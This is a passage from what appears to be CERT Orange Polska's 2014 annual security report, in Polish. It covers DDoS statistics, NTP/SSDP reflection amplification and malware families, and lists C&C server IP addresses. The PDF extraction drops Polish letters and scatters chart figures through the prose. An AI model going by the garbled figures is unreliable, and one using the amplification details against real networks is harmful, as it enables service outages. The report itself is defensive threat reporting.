najwikszych korporacji jest coraz wicej choby zracji
duej poday botnetw, ktre mona wykorzysta do ataku. Dziki temu takie usugi s na czarnym rynku dostpne za niewielkie pienidze.
Rwnie niebezpieczne s kilkuminutowe ataki proponowane
za darmo wramach testu usugi dobry przykad coraz

bardziej powszechnego trendu zwizanego zoferowaniem
usug typu CaaS (Crime as aService). Piciominutowy atak
wzupenoci wystarcza, by uniemoliwi wykonanie transakcji w okrelonym czasie, zablokowa dostp do usugi
w krytycznym czasie czy wylogowa gracza z gry online
podczas e-sportowych rozgrywek.
DDoS jest rwnie uywany jako atak pozorowany, majcy wrzeczywistoci umoliwi przepuszczenie zoliwego
ruchu. Czsto wprzypadku braku innych opcji dla zachowania cigoci biznesu mog zosta wyczone bd
przecione urzdzenia chronice sie (np. IPS). DDoS
moe rwnie mie na celu ukrycie pord milionw pakietw znamion wamania i nieautoryzowanego uzyskania
dostpu do serwerw przedsibiorstwa.
6.2 Statystyki
W2014 roku CERT Orange Polska zidentyfikowa 106 768
alertw DDoS (ostrzee oruchu noszcym znamiona ataku) dotyczcych sieci usugowej Orange Polska, co daje
rednio ok. 9 tysicy alertw miesicznie. To blisko 40-procentowy wzrost wporwnaniu z2013 rokiem. Alerty DDoS
w 2014 roku wpodziale na poziom krytycznoci przedstawiono na Wykresie 4, za wrozkadzie procentowym na
Wykresie 5. Jednego przypadku ataku moe dotyczy kilka
lub kilkanacie alertw, wystpuj take tzw. false positive
klasyfikacja prawidowego ruchu jako anomalii. Wniektrych przypadkach atakw infrastruktura sieciowa potrafi
rozproszy prb bez udziau specjalistycznych rozwiza,
wic nie zostanie on zobrazowany wstatystykach alertw.
18
nio spreparowanymi wywoaniami. Ddla kadego z nich

atakowany obiekt przydziela pami, czas procesora czy
pasmo sieciowe. Przy bardzo duej liczbie da prowadzi
to do byskawicznego wyczerpania dostpnych zasobw
infrastruktury. Z tego powodu dochodzi do przerwy wdziaaniu lub nawet do uszkodzenia systemu. W przypadku
ataku na cze sieciowe celem zazwyczaj jest zajcie caej
dostpnej przepustowoci cza.
6.1 Ryzyka zwizane zatakami DDoS
data
niski
Ataki odmowy dostpu do usugi (Distributed Denial of

Service DDoS) s jednymi z najprostszych i najbardziej
popularnych atakw na sie lub system komputerowy
(np. aplikacje i usugi dostpne z poziomu sieci internet),
azarazem jednymi zbardziej gronych.
Ich gwnym celem jest utrudnienie lub uniemoliwienie
dostpu do usug sieciowych. Przebieg ataku to zwykle
zalewanie (ang. flooding) atakowanego obiektu odpowied-
Dlatego informacje o potencjalnym zagroeniu pojawiaj si po przekroczeniu okrelonych progw alarmowych

ustawianych na relatywnie wysokim poziomie.
Alerty zpoziomem krytycznoci Wysoki stanowi 9 procent wszystkich atakw. Krytyczno alertu zalena jest
od wolumenu ruchu oraz czasu jego trwania. Alert sklasyfikowany jako Wysoki najczciej ma istotny wpyw
na dostpno usug. Alerty o poziomie rednim i niskim
ograniczaj dostpno usug jedynie w specyficznych
warunkach, w przypadkach wystpienia okolicznoci niesprzyjajcych dla atakowanego.

>> Wykres 4. i 5.
19
Wykres 6.
UDP Fragmentation
49%
typ ataku
Reflected DDoS
Typy atakw DDoS
33%
UDP Flood
6%
ICMP Flood
5%
SYN Flood
4%
Inne (TCP RST, ...)
3%
udzia procentowy
Wykres 7.
ntp (1900) out
Charakterystyka ruchu na porcie
60
50
40
30
20
10
0
123 na analizowanym czu
12/01
11/01
10/01
09/01
08/01
07/01
06/01
05/01
04/01
03/01
02/01
Orange Polska
01/01
ruch (Gbps)
ntp (1900) in
data
Wykres 8.
ssdp (1900) out
Charakterystyka ruchu na porcie

1900 na analizowanym czu
40
35
30
25
20
15
10
0
12/01
11/01
10/01
09/01
08/01
07/01
06/01
05/01
04/01
03/01
02/01
Orange Polska
01/01
ruch (Gbps)
ssdp (1900) in
data
Rysunek 3.
botnet
Przykad ataku DNS Reflected
(grafika: Arbor)
faszywe IP ofiary
2
3
DNS
open
resolvers
atakujcy
Typy atakw DDoS obserwowanych w sieci Orange Polska, przedstawiono na Wykresie 6. Poniej szczegowo
opisano poszczeglne kategorie.

>> Wykres 6.
UDP Fragmentation
Zwizany zfragmentacj pakietw UDP, czyli zwysyaniem duych pakietw (powyej MTU2 1500). Konieczno ich ponownego poczenia wznacznym stopniu
wykorzystuje zasoby procesora.
Reflected DDoS
Wysyanie krtkich zapyta do urzdze, w trakcie
ktrych atakujcy podszywa si pod maszyn ofiary.
Urzdzenia docelowe odpowiadaj pakietami kierowanymi na adres pochodzcy z faszywego nagwka, a ofiara zalewana jest olbrzymi liczb pakietw
z wielu hostw. Najczciej wykorzystuj podatnoci
protokow bazujcych na UDP (m.in. DNS, SNMP,
CHARGEN, NTP czy SSDP).
UDP/ICMP Flood
Zalewanie atakowanego hosta pakietami UDP/ICMP
wysyanymi zwielu przejtych hostw/urzdze (botw).
SYN Flood / TCP RST / NULL
Wykorzystuje poczenie inicjujce TCP (zflag SYN/
RST/NULL), np. zalewanie atakowanego hosta pakietami TCP zustawion flag synchronizacji (SYN), resetowaniem poczenia (RST) lub bez flagi (NULL).
Zpunktu widzenia uytkownika kady zwyej wymienionych rodzajw ataku jest niebezpieczny, gdy powoduje
utrat lub ograniczenie dostpnoci usug sieciowych,
takich m.in. jak serwisy webowe, poczta elektroniczna czy
DNS.
W 2014 roku bylimy wiadkami upowszechnienia nowej
metody wzmacniania atakw DDoS. Od pocztku roku
przestpcy zaczli wykorzystywa m.in. niepoprawnie
skonfigurowane serwery czasu (NTP Network Time Protocol), co zostao zobrazowane na Wykresie 7. Natomiast
od trzeciego kwartau 2014 roku obserwowany jest wzrost
wykorzystania protok SSDP (Simple Service Discovery
Protocol) do akceleracji atakw uwidoczniony na Wykresie
8. Pozwalao to atakujcym na przeprowadzenie efektywnych atakw wolumetrycznych, bowiem odpowied le
skonfigurowanego serwera/usugi jest nawet kilkudziesiciokrotnie wiksza od kierowanego do niego zapytania. Na
kolejnych wykresach przedstawiono charakterystyk ruchu
na porcie 123 (NTP) z/do analizowanego cza Orange Polska (transfer danych na czu przekracza momentami 50
Gbps) oraz charakterystyk ruchu na porcie 1900 (SSDP).

>> Wykres 7. i 8.
Na powyszych wykresach ruch w kierunku out jest

znikomy wporwnaniu do ruchu in. Obrazuje to, wjak
znaczcy sposb przy tego rodzaju atakach nastpuje
wzmocnienie ruchu zwielokrotnienie wolumenu odpowiedzi kierowanych do atakowanych hostw.
Na czym polega atak Reflected DDoS? Atakujcy uruchamia botnet (1). Boty, podszywajc si pod adres ofiary,
wysyaj krtkie zapytania do podatnych serwerw/urzdze (2). Urzdzenia w imieniu ofiary odpytuj serwer
DNS (3), aten zwraca odpowied na adres zaatakowanego (4). Wrezultacie cel zalewany jest tysicami odpowiedzi
orozmiarze duo wikszym ni inicjujce zapytanie.

>> Rysunek 3.
Uycie tej techniki powoduje zwikszenie siy ataku bez
znacznego zwikszania zasobw atakujcego, tym samym
nie wymaga posiadania kontroli nad duymi zasobami atakujcymi (botnetem), wystarczy lista podatnych urzdze/
serwerw iproste skrypty do jego przeprowadzenia. Szacuje si, e podatnych urzdze wykorzystujcych protok
SSDP na wiecie jest ok. 15 mln (wPolsce ok. 115 tys.)3,
co pozwala na przeprowadzenie duego ataku DDoS przy
relatywnie niskim koszcie. Rekordowe ataki tego typu na
wiecie sigaj kilkuset Gbps4.
Charakterystyka protokou NTP powoduje, e wysyana
przez serwery NTP odpowied moe by maksymalnie
nawet 556,9 raza5 wiksza od inicjujcego pakietu. Protok NTP wykorzystuje poczenia UDP na porcie 123 do
synchronizacji czasu pomidzy komputerami wsieci, natomiast protok SSDP suy do wykrywania urzdze UPnP
(Universal Plug and Play) iwykorzystuje poczenia UDP na
porcie 1900.
Istotnym problemem wydaj si urzdzenia bezpieczestwa dla SOHO (Small Office/Home Office), ktre usiuj
pogodzi nisk cen z szerokim zakresem oferowanych
funkcjonalnoci, w efekcie proponujc kocowemu uytkownikowi bardzo niski poziom bezpieczestwa. Razem
z otwartymi serwerami DNS (open DNS-resolvers) czy te
publicznymi i otwartymi serwerami NTP i SNMP daje to
szereg potencjalnych wektorw ataku. Jeeli uytkownicy
nie bd mieli wiadomoci, e stosowanie odpowiednich
zabezpiecze jest konieczne, same dziaania prowadzone
po stronie operatora (mitygacja atakw wczasie rzeczywistym, filtrowanie podrobionych pakietw) mog si okaza
niewystarczajce.
By si broni przed tego typu atakami, naley:
wyczy usug wszdzie tam, gdzie nie jest potrzebna,
nie udostpnia usug wszystkim uytkownikom, jeli
nie jest to konieczne,
korzysta zmoliwie najnowszej wersji protokou.
ofiara
Maximum Transportation Unit rozmiar najwikszego datagramu moliwego do przekazania przez warstw protokou komunikacyjnego
rdo: https://ssdpscan.shadowserver.org/ dane na dzie 2015-01-05
rdo: http://www.arbornetworks.com/asert/2014/03/ntp-attacks-continue-a-quick-look-at-traffic-over-the-past-few-months/
5
rdo: US-CERT, https://www.us-cert.gov/ncas/alerts/TA14-017A
2
20
21
Sia oraz czas trwania atakw DDoS

Zroku na rok obserwujemy wzrost siy atakw DDoS. Na
Wykresie 9. przedstawiono obserwowany przez CERT
Orange Polska rozkad procentowy wielkoci ruchu
generowanego w atakach DDoS. Wzrost siy atakw
jest spowodowany nie tylko coraz wiksz dostpnoci
i przystpnoci cenow szerokopasmowych czy internetowych oraz wiksz liczb urzdze wsieci. Jest spowodowany rwnie stosowaniem nowych technik wzmacniania atakw (np. z wykorzystaniem protokou NTP czy
SSDP), atake spadkiem cen atakw dostpnych na czarnym rynku.
rednia wielko szczytowego natenia ataku odnotowana przez CERT Orange Polska to ok. 900 Mbps, natomiast
najwiksza odnotowana warto natenia ruchu wszczycie ataku to ok. 93 Gbps/50 Mpps.

>> Wykres 9.
Wykres 10. przedstawia rozkad procentowy czasu trwania
atakw DDoS. Wikszo zarejestrowanych alertw trwaa
poniej 10 minut, natomiast redni czas trwania wszystkich
zarejestrowanych alertw to ok. kilkunastu minut.

>> Wykres 10.
6.3 Okiem partnera Radware

Od kilku lat utrzymuje si tendencja dywersyfikacji celw ataku poczona ze skracaniem czasu ich trwania. Ubiegy rok
po raz kolejny potwierdzi ten trend iw2015 roku moemy si
spodziewa jego utrzymania. Krtkotrwae ataki s bolczk dla form ochrony przed DDoS zakadajcych uruchomienie mitygacji po kilku/kilkunastu minutach cigego ataku.
Istnieje dua liczba metod ochrony przed atakami DDoS,
jednak due ataki wolumetryczne mog zosta zmitygowane jedynie na poziomie ISP bd przy wsparciu specjalistycznych firm ukrywajcych chronione serwisy za swoj
infrastruktur. Wtakiej sytuacji ograniczenie skutkw ataku
nastpuje dziki geograficznemu rozproszeniu wzw, za
ktrymi serwis jest dostpny, filtrowaniu zoliwego ruchu
oraz czom oduej przepustowoci.
Dla ochrony wasnej sieci korporacyjnej przed DDoS Orange Polska uywa rozwiza wiodcego producenta Arbor
Networks. Wykorzystujemy take moliwoci blokowania
adresw potwierdzonych jako rdo atakw albo ograniczenia dostpu do atakowanych zasobw. Identyczne
rozwizanie w postaci usug oferujemy rwnie swoim
klientom.
wolumen ataku [Gbps]
Wykres 9.
powyej 10
3,8%
5-10
3,7%
2-5
Wolumen atakw DDoS zaobserwowanych w sieci Orange Polska

8,8%
0,5-2
30,6%
0,2-0,5
28,8%
poniej 0,2
24,3%
czas trwania alertu (minuty)
Zaobserwowalimy te szereg kampanii, wktrych silny atak SYN Flood trwa

przez minut i zosta wznowiony po 15-minutowej przerwie. W innych przypadkach organizacja przez 3 minuty bya celem bardzo duego ataku wolumetrycznego, ktry nastpnie milk na godzin, a po tym czasie zosta wznowiony.
To odpowied na zabezpieczenia przeciwko DDoS, ktre osigaj pen efektywno po kilku minutach od stwierdzenia ataku tego typu ataki pozwalaj na
ich faktyczne ominicie.
Werner Thalmeier,
Director Security Solutions EMEA & CALA
Wubiegym roku zaobserwowalimy rwnie wyrany wzrost czasu trwania atakw. 19 procent ofiar zgaszao, e byo atakowane wtrybie cigym. Wminionych latach (2013, 2012 and 2011) czsto zdarzay si sytuacje, gdy raportowano tygodniowe, czy nawet miesiczne ataki, ale liczba badanych przez Radware
firm, padajcych ofiar atakw cigych, nigdy nie przekraczaa 6 procent!
To moe by powane wyzwanie w2015 roku.
Firma Radware to jeden zczoowych wiatowych dostawcw rozwiza ochrony
przed atakami DDoS.
udzia procentowy
22
Serwery, firewalle, cze dostpowe to wszystko padao ofiar atakw DDoS.

Najczciej zawodzio samo cze, wysycajc si do tego stopnia, e ruch sieciowy nie dociera ju do urzdze sieciowych. Ubiegy rok by dla cyberprzestpcw czasem prb, jeli chodzi oprotokoy internetowe. Sprawdzali chyba kady
DNS, NTP, CHARGEN, SSDP itd. by zdecydowa, ktry najbardziej nadaje
si do atakw Reflected DDoS.
Na kad kampani cyberprzestpcz, ktr obserwowalimy wubiegym roku,
skaday si rnorodne wektory ataku, do tego stopnia, e to kampanie uywajce jednego wektora mona by nazwa wyjtkowymi. Dla zwykego internauty DDoS to po prostu DDoS, istniej jednak setki jego wariantw, nierzadko wwyniku ataku kreujce nowe warianty. Przykadowo Tsunami SYN Flood,
odkryty w 2014 roku, bazuje na klasycznym SYN Flood, nie mamy jednak do
czynienia zpustymi pakietami TCP SYN, bowiem kady znich zawiera jeszcze ok. 1 kB nieistotnych danych, pozwalajc atakujcemu przeprowadzi atak
wolumetryczny przy uyciu protokou TCP. Co ciekawe, RFC nie odrzuca takich
przypadkw uycia.
Wykres 10.
powyej 60
2,2%
30-60
3,0%
15-30
10-15
Czas trwania atakw DDoS

zaobserwowanych w sieci Orange
Polska
16,0%
20,0%
58,9%
poniej 10
udzia procentowy
23
7. Malware
Malware to termin uywany na

okrelenie oprogramowania,
ktrego zadaniem jest
wykonywanie szkodliwych
dziaa na komputerze ofiary
Malware (od angielskich sw malicious zoliwy, software oprogramowanie) to termin uywany na okrelenie
oprogramowania, ktrego zadaniem jest wykonywanie
szkodliwych dziaa na komputerze ofiary. Oprogramowanie tego typu infekuje komputery, jest na nich instalowane bez wiedzy i zgody uytkownikw. Do dystrybucji
zoliwego oprogramowania wykorzystywane s na przykad mailowe ataki phishingowe (przesyanie zainfekowanych zoliwym kodem plikw), skonienie uytkownika do
odwiedzenia strony zawierajcej takie oprogramowanie,
instalowanie malwareu umieszczonego w pirackich wersjach programw bd plikach znalezionych winternecie.
Zoliwe oprogramowanie jest czsto wykorzystywane do
przejmowania kontroli nad zainfekowanymi komputerami
przez osoby nieuprawnione idoczania tych urzdze do
sieci botnetowych. Moe by rwnie przyczyn wycieku
danych zgromadzonych na nonikach podczonych do
zainfekowanych stacji roboczych, a take kradziey poufnych informacji wprowadzanych przez uytkownikw (m.in.
loginy, hasa).
W 2014 roku zaobserwowano znaczcy wzrost liczby
malware opracowanego na urzdzenia mobilne przede
wszystkim pracujce pod kontrol systemu Android, jednak inne systemy operacyjne zarzdzajce naszymi smartfonami rwnie nie s wolne od zagroe.
Pojcie zoliwych operacji trudno zdefiniowa jednoznacznie, tym niemniej na oglnym poziomie przyjto,
e wi si one znastpujcymi skutkami:
uzyskiwanie przez uytkownika dostpu do informacji,
dla ktrego nie jest ona przeznaczona,
zakcanie dziaania systemw.
Wszczeglnoci s to nastpujce funkcje:
wykonywanie atakw DDoS,
kradzie danych,
rozprzestrzenianie si na inne systemy i oprogramowanie,
niszczenie danych.
Mona wyrni kilka gwnych typw zoliwego oprogramowania (klasyfikacja wg ENISA6):
wirus
Infekuje inne oprogramowanie, np. program wykonywalny EXE, a ten nastpnie infekuje kolejne odnalezione na dysku lub uruchomione przez uytkownika
programy EXE.
robak
Ma za zadanie szybko rozprzestrzenia si pomidzy
systemami operacyjnymi izainfekowa jak najwiksz
liczb maszyn.
trojan
Oprogramowanie, ktre pod pozorem niegronych
dziaa wprowadza na urzdzenie ofiary inne zoliwe
programy ifunkcjonalnoci.
backdoor
Cyberprzestpcy instaluj na zaatakowanych systemach backdoory (tylne wejcia) w celu zapewnienia
sobie dostpu do nich wpniejszym czasie.
rootkit
Ma za zadanie ukry inne programy w systemie,
a przez to utrudni ich odnalezienie i analiz. Czsto
robi to, ingerujc gboko w mechanizmy dziaajce
upodstaw systemw operacyjnych.
exploit
Wykorzystuje wystpujcy w oprogramowaniu bd
programistyczny w celu przejcia kontroli nad dziaaniem procesu i uruchomienia powoki systemowej
z uprawnieniami programu, w ktrym wykryto luk
wzabezpieczeniach.
keylogger
Zbiera informacje wprowadzane do systemu przez
uytkownika za pomoc klawiatury/myszy.
Opisujc zoliwe oprogramowanie, nie mona zapomina
opojciach bot i botnet. Bot to komputer zainfekowany zoliwym oprogramowaniem, czcy si iodbierajcy
komendy z Centrum Kontroli (Command&Control, C&C).
Botnet natomiast to sie botw.
Wspczesnego malware najczciej nie da si przyporzdkowa do konkretnej kategorii, ma on bowiem cechy
kilku z nich. Dla przykadu ZeroAccess to trojan sucy
jako platforma do instalacji innego zoliwego oprogramowania, wykorzystujca zaawansowane techniki ukrywania si wsystemie operacyjnym charakterystyczne dla
rootkitw. Zkolei Stuxnet propaguje si jak robak, ale ma
rwnie funkcje trojana, komunikujcego si ze zdalnymi
wzami C&C.
Uytkownik sieci korzystajcy zportalu bankowoci online
moe pa ofiar tzw. trojana bankowego. Jego elementy
rozmieszczone wzainfekowanym systemie zbieraj dziki
wykorzystaniu zaawansowanych technik informacje, zwizane zzarzdzaniem kontem bankowym ofiary.
https://www.enisa.europa.eu/activities/Resilience-and-CIIP/critical-applications/botnets/botnets-measurement-detection-disinfection-and-defence
25
Wykres 11.
Typy zagroe zoliwym
90%
oprogramowaniem
80%
70%
Chodzi m.in. o odczytywanie nacini klawiszy, zrzuty

ekranu przy klikaniu myszk (dla zarejestrowania interakcji zwirtualn klawiatur), podsuchiwanie imodyfikowanie
informacji na poziomie przegldarki bd jej dodatkw (np.
Java). CERT Orange Polska pozyskuje informacje onowych
przypadkach zoliwego kodu z urzdze monitorujcych
umieszczonych wrnych punktach sieci klienckiej. Nowe

instancje zoliwego oprogramowania zidentyfikowane
w sieci Orange Polska s szczegowo analizowane, za
jeli wwyniku analizy zostan ustalone np. adresy centrw
Command&Control, docelowo dostp do nich jest blokowany zcaej sieci, ktrej operatorem jest Orange Polska.
60%
7.1 Malware na platformy stacjonarne
50%
40%
Malware Callback
30%
Infection Match
20%
Domain Match
10%
Uytkownicy Neostrada
grudzie
listopad
padziernik
wrzesie
grudzie
listopad
padziernik
wrzesie
0%
Uytkownicy Internet DSL
Wykres 12.
Zoliwe oprogramowanie w funkcji liczby

alarmw Callback dla Neostrady
60%
Top 5 typw zagroe zoliwym

oprogramowaniem dla klientw
Neostrada
57%
49%
50%
40%
Local.Callback
Trojan.ZeroAccess
30%
Trojan.Sisron
23%
20%
18%
Worm.Email.Brontok
Trojan.Sality
10%
10%
3%
3%
2%
0%
wrzesie
26
20%
22%
5%
2%
1%1%
padziernik
5%
1% 1%
1%
listopad
5% 5%
grudzie
Majc na uwadze ewolucj zagroe, CERT Orange Polska prowadzi cigy rozwj narzdzi monitorowania zagroe i przeciwdziaania im. We wrzeniu 2014 roku uruchomiona zostaa nowa platforma bezpieczestwa, dziki
ktrej moliwe jest monitorowanie poziomu iminimalizacja
zagroe zwizanych zmalware, adotykajcych uytkownikw sieci Orange Polska. Wykres 11. przedstawia udzia
procentowy trzech najpopularniejszych rodzajw zagroe
wystpujcych w sieci Orange Polska. Obrazuje zdarzenia zwizane ze zoliwym oprogramowaniem pod wzgldem unikalnych uytkownikw dla cz usugi Neostrada
(gwnie uytkownicy prywatni) oraz Internet DSL (gwnie
mae i rednie podmioty gospodarcze) dla reprezentatywnej prbki 25 tys. uytkownikw. Te ikolejne wykresy
przedstawiaj prbk wpostaci wartoci zczterech ostatnich miesicy 2014 roku. Wkolejnym okresie raportowym
moliwe bdzie wskazanie penego zakresu danych z 12
miesicy.

>> Wykres 11.
Od wrzenia do grudnia 2014 roku dla cz usugi Neostrada zauwaalna jest spadkowa tendencja dla malware
z kategorii Infection Match. Zdarzenia zdefiniowane jako
Infection Match przedstawiaj infekcje wczasie rzeczywistym widocznie m.in. wformie zaraonych plikw pobieranych na urzdzenie uytkownika, zoliwego kodu wykonywanego podczas otwierania zainfekowanych witryn albo
kolejnych prb infekcji na zaraonej ju stacji.
Znaczny wzrost zagroe mona zauway dla Malware
Callback oraz Domain Match.
Malware Callback to poczenie wykonywane przez malware zainstalowany na zainfekowanym komputerze
z serwerem Command&Control w celu pobrania instrukcji sterujcych oraz wysyania wykradzionych danych lub
aktualizacji zoliwego oprogramowania. Domain Match
jest wysyanym zzainfekowanego przez malware komputera zapytaniem onazw domeny uywanej do lokalizacji
serwera Command&Control. Zoliwe oprogramowanie

uywa bowiem algorytmw generowania domen (Domain
Generation Algorithm, DGA) tworzcych dynamicznie skadajce si zcigw losowych znakw nazwy domen, do
ktrych przypisany jest przewanie jeden lub dwa serwery
Command&Control.
Wiele zwymienionych zagroe uwarunkowanych jest stale rosnc liczb bdw ipodatnoci, wykorzystywanych
wtworzeniu zoliwego oprogramowania lub uatwiajcych
infekowanie systemw operacyjnych. Lekarstwem na
wzrost zagroe moe by bardziej powszechne wprowadzanie rodkw zapobiegawczych, m.in. sond monitorujcych ruch sieci botnetowych rwnie pod ktem konkretnych odmian zoliwego oprogramowania.
Ponisze dwa wykresy przedstawiaj aktywno Top 5
najpopularniejszego zoliwego oprogramowania zarejestrowan na prbce 25 tysicy klientw cz Neostrada
i Internet DSL od wrzenia do grudnia 2014 roku. Pod
uwag brano liczb unikalnych pocze od uytkownikw
do serwerw Command&Control.

>> Wykres 12.

>> Wykres 13.
Najwiksz aktywno na powyszych wykresach mona
zauway wprzypadku zainfekowania uytkownikw Internet DSL malware o nazwie InfoStealer.Zbot. To rodzina
Zeusa popularnego wirusa wykradajcego dane zwizane zbankowoci elektroniczn. Na opisywanej prbce
wida rwnie drastyczny wzrost w ostatnich miesicach
roku liczby infekcji wirusem Backdoor.APT.LV (jej przyczyny
zostay szerzej wyjanione wtym rozdziale wczci ze spostrzeeniami naszego partnera, firmy FireEye) oraz Trojan.
Zero.Access. Statystyki potwierdzaj informacje medialne,
mwice o tym, e cyberprzestpcy przeprowadzili pod
koniec roku skoordynowan fal atakw, wykorzystujc
odmiany zoliwego kodu niewykrywanego wtamtym okresie
przez oprogramowanie antywirusowe.
27
Wykres 13.
Zoliwe oprogramowanie w funkcji liczby

alarmw Callback dla klientw Internet DSL
Top 5 typw zagroe zoliwym

oprogramowaniem dla klientw
Internet DSL
45%
40%
39%
33%
35%
InfoStealer.Zbot
30%
25%
20%
20%
27%
28%
25%
5%
7%
6%
4%
1%
1%
0%
Backdoor.APT.LV
9%
8%
6%
4%
wrzesie
padziernik
Trojan.ZeroAccess
17%
15%
10%
Trojan.Ramnit
21%
20%
15%
Backdoor.NjwOrm
0%
listopad
grudzie
Uytkownicy powizani i niepowizani ze zoliw zawartoci

100%
80%
70%
71%
niepowizani ze zoliw zawartoci
64%
51%
49%

powizani ze zoliw zawartoci
39%
40%
30%
63% 64%
61%
50%
uytkownikw cz Neostrada oraz
powizani ze zoliw zawartoci
71%
60%
Dane dotyczce komunikacji

Internet DSL zserwerami C&C
86%
90%
Wykres 14.
35%
37%
29%
20%
36%

niepowizani ze zoliw zawartoci
29%
14%
10%
0%
wrzesie
padziernik
listopad
grudzie
Wykres 15.
Top 5: Adresy IP wykorzystywane przez zoliwe

oprogramowanie dla Neostrady
7%
5%
5%
4%
4%
4%
4%
3%
3%
5%
6%
Worm.Email.Brontok
98.37.201.117
4%
4%
4%
4%
3%
3%
3%
3%
2%
2%
2%
1%
28
wrzesie
Trojan.Sisron
42.121.125.34
Trojan.Sisron
42.121.133.1
Trojan.Ramnit
109.74.195.149
Trojan.Sisron
118.184.176.15
1%
0%
dla Neostrady
7%
6%
4%
Poczenia do Command&Control
padziernik
listopad
Opisy najciekawszych malware (szczegowe analizy przypadkw zoliwego oprogramowania zostay zamieszczone wzacznikach od 1. do 3. wkocowej czci raportu):
Trojan.ZeroAccess
Za porednictwem backdoora w systemie operacyjnym trojan wymusza komunikacj z zaraonej stacji
do zewntrznego centrum sterowania, np. na porcie
TCP 49163. Potrafi rwnie przez ukryte pliki systemowe zestawi poczenie TCP 80 do pobierania na
zainfekowane urzdzenie rnego rodzaju zoliwego
oprogramowania.
InfoStealer.Zbot
Ko trojaski (rodzina Zeus), ktry wykrada poufne
dane z zainfekowanego komputera. Jest w stanie
pobiera samodzielnie pliki konfiguracyjne iaktualizacje zcentrum sterowania.
Backdoor.Njw0rm
Ko trojaski wykradajcy hasa dostpowe zapisane w pamici zaraonego komputera. Jest w stanie
przenie si na urzdzenia sieciowe albo na noniki
zewntrzne.
Trojan.Ramnit
Ko trojaski umoliwiajcy przejcie zdalnego dostpu do komputera ikontroli nad zaraonym komputerem
przez centrum sterowania, anastpnie wykorzystanie
go do celw zwizanych zcyberprzestpczoci.
Trojan.Sality
Wirus infekujcy pliki wykonywalne na dyskach lokalnych, sieciowych i zewntrznych. Zestawia rwnie
poczenie peer-to-peer zbotnetem wcelu uzyskania
URL, prowadzc do kolejnych zainfekowanych plikw.
Bot.Conficker
Otwiera atakujcemu zdalny dostp do warstwy systemu operacyjnego. Naley do grupy botw pozwalajcych na instalowanie backdoorw, ciganie iwykonywanie dodatkowych zoliwych plikw oraz blokowanie
dostpu z komputera uytkownika do aplikacji, programw iwitryn bezpieczestwa, co znacznie utrudnia
jego usunicie.
Bot.Mariposa.DNS
Oprogramowanie klienckie sieci botnetowej wykradajce dane dostpowe uytkownikw, infekujce oprogramowanie pocztowe, atake wykorzystujce zaraone komputery do atakw DDoS.
Trojan.Ramnit.SNK.DNS
Oprogramowanie klienckie sieci botnetowej przejmujce zdaln kontrol nad komputerem zaraonym trojanem Ramnit.
Worm.Email.Brontok.DNS
Oprogramowanie klienckie sieci botnetowej obsugujce robaki emailowe. Robaki Brontok rozprzestrzeniaj
si wzacznikach wiadomoci e-mail, zmieniaj ustawienia komputera, modyfikuj rejestr i blokuj moliwo jego edycji.
Backdoor.DarkComet
Backdoor pozwalajcy atakujcemu na uzyskanie nieautoryzowanego dostpu do komputera ikontroli nad
zaraonym komputerem.
Local.Callback
Poczenie do centrum sterowania nie majce cech
charakterystycznych pozwalajcych na okrelenie
jego przynalenoci do specyficznej rodziny zoliwego
oprogramowania.
Wykres 14. przedstawia prbk ruchu z czterech miesicy dotyczc powizania uytkownikw usug Internet DSL
oraz Neostrada w udziale procentowym z ruchem o charakterze anomalii wywoanym zoliwym oprogramowaniem.

>> Wykres 14.
Obserwacje ruchu dowodz, e w badanym okresie
zadresw IP rednio u 50 procent uytkownikw stwierdzono ruch wskazujcy na dziaanie zoliwego oprogramowania. Wysoki odsetek zaraonych uytkownikw
Internet DSL (z reguy usugi dla maych i rednich firm)
moe wskazywa zarwno na niski poziom wiadomoci
bezpieczestwa, jak i na brak zabezpiecze w tego typu
maych sieciach firmowych. Nisze wskaniki dotyczce
sieci Neostrada mog wiadczy zarwno owyszej wiadomoci bezpieczestwa uytkownikw indywidualnych,
jak iolepszym poziomie zabezpiecze wykorzystywanych
przez nich urzdze dostpowych. Nagy skok liczby uytkownikw, powizanych ze zoliw zawartoci pokrywa
si z przedstawionym na Wykresie 12. znacznym wzrostem infekcji trojanem ZeroAccess, dowodzc susznoci
przedstawionych wczeniej wnioskw o ataku zoliwym
oprogramowaniem niewykrywalnym jeszcze pod koniec
2014 roku.
Wykres 15. przedstawia Top 5 malware, adresy serwerw
Command&Control oraz udzia procentowy uytkownikw
Neostrady, ktrzy czyli si znimi wtrakcie analizowanego
okresu ostatnich czterech miesicy 2014 roku.

>> Wykres 15.
Na czach Neostrady mona zauway, e jedyny wzrost
swojej aktywnoci mia wirus Trojan.Sisron komunikujcy
si z rnymi serwerami Command&Control. Wiele przypadkw zoliwego oprogramowania powizanych z konkretn adresacj jednego miesica stanowicych najwiksze rdo zagroenia wkolejnych moe zupenie znikn
zmonitorowanej sieci. Zazwyczaj oznacza to niestety tylko
zmian charakterystyki odwoa definiujcych rodzaj zagroenia, bd adresacji kocowej, odpowiadajcej za poczenia zofiarami atakw. Std konieczno monitorowania
sieci wtrybie cigym pod ktem anomalii wskazujcych na
dziaanie zoliwego oprogramowania.
grudzie
29
7.2 Malware na platformy mobilne

Telefon komrkowy pozwala dzisiaj na korzystanie zwielu
usug dostpnych w sieci internet. Coraz czciej smartfony umoliwiaj te dostp do sieci firmowych, co przy
lekcewaeniu zagroe mobilnych wprowadza szereg
dodatkowych ryzyk. Smartfon to praktycznie komputer
i dlatego przy korzystaniu z jego funkcjonalnoci musimy
liczy si z takimi samymi zagroeniami jak w przypadku
tradycyjnego komputera. Zoliwe oprogramowanie na terminale mobilne moe wykra wane dane, wartoci pienine z kont bankowych albo uy naszego urzdzenia
do przeprowadzania atakw DDoS czy spam. Instalujc
aplikacje od niepewnych dostawcw lub spoza oficjalnych sklepw, nie moemy by pewni, czy nie zawieraj
dodatkowych funkcji pozwalajcych na przejcie kontroli
7.3 Okiem partnera FireEye

nad systemami mobilnymi. Wopinii CERT Orange Polska
trend atakw na urzdzenia mobilne bdzie jeszcze przez
dugi czas regularnie wzrasta. Mimo cigego budowania
wiadomoci zagroe u uytkownikw urzdzenia mobilne wci stanowi najsabsze ogniwo bezpieczestwa
zarwno dla firm, jak idla prywatnego uytkownika.

>> Wykres 16.
W zaczniku 3. na kocu raportu mona znale szczegow analiz najpopularniejszego trojana wystpujcego
wsieci mobilnej Orange Polska: Android.NotCompatible.
Przegldajc statystyki zwizane ze zoliwym oprogramowaniem zaprezentowane

